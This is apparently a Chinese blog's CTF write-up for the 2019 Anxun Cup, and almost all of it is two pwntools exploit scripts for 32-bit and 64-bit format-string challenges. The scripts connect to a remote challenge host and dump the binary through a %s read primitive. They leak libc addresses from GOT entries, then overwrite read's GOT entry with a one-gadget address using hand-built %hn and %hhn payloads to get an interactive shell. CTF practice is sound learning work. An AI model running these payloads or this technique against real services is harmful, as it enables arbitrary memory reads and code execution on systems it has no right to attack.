安洵杯2019
安洵杯2019
fmt32
fmt leak binary, leak libc got, modify read’s got
from pwn import *
import plus_fmt as pft
start_addr=0x8048000
end_addr=0x804a000
p=remote('47.108.135.45',10001)
def leak(addr):
p.recvuntil('Please tell me:')
payload='%10$s'+'OOOO'+p32(addr)
p.sendline(payload)
p.recvuntil('Repeater:')
data=p.recvuntil('OOOO',True)
data+='\x00'
return data
def binary_get():
f=open('pwnelf','w')
f2=open('pwnelf2','w')
cur_addr = start_addr
while cur_addr<=end_addr:
data = leak(cur_addr)
log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
cur_addr += len(data)
if f2.closed==False:
f2.write(data)
if cur_addr>start_addr+0x500:
f2.close()
f.write(data)
f.close()
puts_got=0x804A01C
read_got=0x804A010
printf_got=0x804A014
stderr_got=0x804A040
payload='%10$s'+'OOOO'+p32(puts_got)
p.sendline(payload)
p.recvuntil('Repeater:')
puts_so=u32(p.recvn(4))
print(hex(puts_so))
libc_base=puts_so-0x5f140
one=libc_base+0x3a80c
print(hex(libc_base))
system=0x03a940+libc_base
payload='%10$s'+'OOOO'+p32(stderr_got)
p.sendline(payload)
p.recvuntil('Repeater:')
stderr_so=u32(p.recvn(4))
print(hex(stderr_so),hex(one))
log.success('one:%#x,stderr:%#x'%(one,stderr_so))
tag = {read_got:one} #printf->one
# payload = pft. new_fmtstr_payload(8, tag, bits=32, write_size='short')
# #payload='%34819c%17$hn%28622c%18$hnaa\x10\xa0\x04\x08\x12\xa0\x04\x08'
# #one:0xf7de480c
# p.sendline(payload)
low=one&0xffff
low-=9
high=one>>16
log.success('high:%#x,low:%#x'%(high,low))
str_low=str(low)
str_high=str(high)
offset=15
payload=''
payload += '%'+str_low+'c%'+str(offset)+'$hn'
payload += '%'+str(high-low-9)+'c%'+str(offset+1)+'$hn'
align=((4-len(payload)%4)+1)
payload+='a'*align
print(len(payload))
payload += p32(read_got)+p32(read_got+2)
p.sendline(payload)
# print(repr(payload))
# p.recvuntil('Repeater:')
# payload='%10$s'+'OOOO'+p32(stderr_got)
# p.sendline(payload)
# p.recvuntil('Repeater:')
# stderr_so=u32(p.recvn(4))
# print(hex(stderr_so),hex(one))
p.interactive()
fmt64
leak速度很慢,利用给的 readelf -s fmt64 ,计算ELF的read GOT,改got,pwntools fmt 打不了。手写一个fmt。
from pwn import *
import plus_fmt as pft
p=remote('47.108.135.45',20176)
# payload='%9$ppppp'+'a'*0x8
# p.sendline(payload)
# p.interactive()
start_addr=0x400000
end_addr=start_addr+0xf00
f=open('elf','w')
def leak(addr):
p.recvuntil('Please tell me:')
payload='%9$s'+'OOOO'+p64(addr)
p.sendline(payload)
p.recvuntil('Repeater:')
data=p.recvuntil('OOOO',True)
data+='\x00'
return data
def binary_get():
cur_addr = start_addr
while cur_addr<=end_addr:
data = leak(cur_addr)
log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
cur_addr += len(data)
f.write(data)
f.close()
#binary_get()
got_base=0x601018
puts_got=got_base
read_got=got_base+6*8
stderr_got=0x6010a0
strlen_got=got_base+8
p.recvuntil('Please tell me:')
payload='%9$s'+'OOOO'+p64(puts_got)
p.sendline(payload)
p.recvuntil('Repeater:')
puts_so=u64(p.recvn(6).ljust(8,'\x00'))
libc_base=puts_so-0x06f690
one=0xf1147+libc_base
system=libc_base+0x45390
log.success('libc_base ==> %#x,one ==> %#x'%(libc_base,one))
tag=[read_got,one]
prew=9
by=[]
one2=one
offset=17
#tag={stderr_got:one}
#payload = pft. new_fmtstr_payload(8, tag, numbwritten=0,bits=64, write_size='short')
for i in range(6):
by.append(one2&0xff)
one2>>=8
print(by)
payload = ''
for i in range(6):
payload += '%'
cnt=(0x100+by[i]-(prew%0x100))%0x100
payload +=str(cnt)
payload+='c%'+str(offset+i)+'$hhn'
prew+=cnt
payload += 'a'*(8-len(payload)%8)
log.success('payload ==> %s,%d'%(repr(payload),len(payload)))
if(len(payload)==64):
print('abort')
exit(0)
for i in range(6):
payload+=p64(tag[0]+i)
log.success('payload ==> %s,%d'%(repr(payload),len(payload)))
p.send(payload)
# p.recvuntil('Repeater:')
# payload='%9$s'+'OOOO'+p64(read_got)
# p.sendline(payload)
# p.recvuntil('Repeater:')
# stderr_so=u64(p.recvn(6).ljust(8,'\x00'))
# log.success('stderrgot ==> %#x',stderr_so)
p.interactive()
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。
文章标题:安洵杯2019
本文作者:枫云李
发布时间:2019-11-30, 00:00:00
最后更新:2020-04-11, 01:24:25
原始链接:https://primelyw.github.io/2019/11/30/%E5%AE%89%E6%B4%B5%E6%9D%AF2019/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。